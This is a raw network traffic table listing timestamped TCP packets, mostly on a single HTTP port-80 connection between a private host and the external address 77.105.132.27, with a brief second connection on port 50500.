Jul 1, 2024 09:16:14.439594984 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.439598083 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.439609051 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.439618111 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.439636946 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.441265106 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.441276073 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.441287041 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.441334009 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.441356897 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.441368103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.441380978 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.441391945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.441392899 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.441406965 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.441422939 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.441601038 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.441638947 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.443562984 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.443574905 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.443587065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.443629980 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.443655014 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.443665981 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.443676949 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.443700075 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.443717003 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.443743944 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.443799019 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.443809986 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.443820953 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.443845987 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.443865061 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.443927050 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.443938971 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.443949938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.443960905 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.443972111 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.443981886 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.443996906 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.444014072 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.444082022 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444092989 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444103003 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444124937 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.444139004 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.444197893 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444209099 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444216013 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444248915 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.444317102 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444328070 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444353104 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.444370031 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.444395065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444411039 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444453001 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.444499969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444511890 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444519043 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444525957 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444540024 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.444561958 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.444654942 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444665909 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444679022 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444689035 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444698095 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.444711924 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.444745064 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.444766998 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444777966 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444787979 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444794893 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444801092 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444818020 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.444834948 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.444986105 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.444994926 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445005894 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445017099 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445028067 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445041895 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.445045948 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445060968 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.445070982 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.445089102 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.445115089 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445127010 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445162058 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.445292950 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445302963 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445312977 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445323944 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445334911 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445338011 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.445346117 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445354939 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.445360899 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445372105 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445384979 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.445400000 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.445504904 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445595026 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445605040 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445636988 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.445652962 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.445676088 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445687056 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445698977 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445709944 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445722103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445727110 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.445744038 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.445760012 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.445878983 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445889950 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445900917 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.445930958 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.445947886 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.446021080 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.446032047 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.446042061 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.446053028 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.446063995 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.446074963 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.446074963 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.446085930 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.446095943 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.446098089 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.446109056 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.446116924 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.446140051 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.446329117 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.446341038 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.446369886 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.446387053 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.486896992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.486916065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.486928940 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.486973047 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.486978054 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.486983061 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.486994982 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.487018108 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.487039089 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.487113953 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.487127066 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.487164974 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.533246040 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533266068 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533281088 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533294916 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533308029 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533318996 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533327103 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.533330917 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533344030 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533356905 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.533376932 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.533534050 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533545971 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533555984 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533562899 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533574104 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533576965 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.533613920 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.533905029 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533917904 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533931971 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533943892 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533956051 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533963919 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.533966064 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533978939 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533981085 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.533991098 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.533994913 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.534003019 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.534013033 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.534013033 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.534029961 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.534037113 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.534064054 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.534368992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.534384966 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.534399033 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.534420967 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.534445047 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.535953999 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.535967112 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.535979033 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.536010027 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.536019087 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.536020041 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.536031961 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.536045074 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.536051035 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.536066055 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.536083937 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.538294077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538386106 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538395882 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538407087 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538419962 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538430929 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538439035 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.538444996 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538479090 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.538603067 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538614035 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538626909 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538638115 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538650036 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538657904 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.538660049 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538671970 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538676023 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.538682938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538690090 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.538707018 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.538712978 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538722992 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538733959 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538733959 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.538747072 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538752079 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.538758039 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538774967 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.538774967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538788080 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538795948 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.538801908 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538811922 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.538820982 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.538844109 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.538997889 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539010048 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539027929 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539033890 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539040089 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539051056 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539052010 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539062977 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539069891 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539076090 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539088011 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539094925 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539114952 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539134979 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539335012 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539346933 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539364100 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539374113 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539374113 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539386988 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539393902 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539401054 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539417028 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539421082 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539426088 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539447069 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539470911 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539647102 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539659023 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539669991 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539681911 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539693117 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539695978 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539706945 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539720058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539720058 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539738894 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539762974 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539845943 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539858103 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539870977 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539882898 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539891005 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539895058 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.539916992 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.539974928 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.540026903 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.540059090 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.540087938 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.540102005 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.540111065 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.540122032 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.540133953 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.540143967 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.540158033 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.540185928 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.540215969 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.540226936 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:14.540246964 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:14.540262938 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.484729052 CEST	49747	50500	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.484914064 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.489721060 CEST	50500	49747	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.489742994 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.682125092 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.682199001 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.682615042 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.687484026 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.880870104 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.880896091 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.880907059 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.880943060 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.880954027 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.880970955 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.880985975 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.881036043 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.881072998 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881122112 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.881140947 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881153107 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881181955 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.881195068 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.881294966 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881308079 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881320000 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881330967 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881340981 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.881342888 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881381035 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.881561995 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881580114 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881592989 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881603956 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.881630898 CEST	49752	80	192.168.2.4	77.105.132.27
Jul 1, 2024 09:16:15.881658077 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881669044 CEST	80	49752	77.105.132.27	192.168.2.4
Jul 1, 2024 09:16:15.881680965 CEST	80	49752	77.105.132.27	192.168.2.4
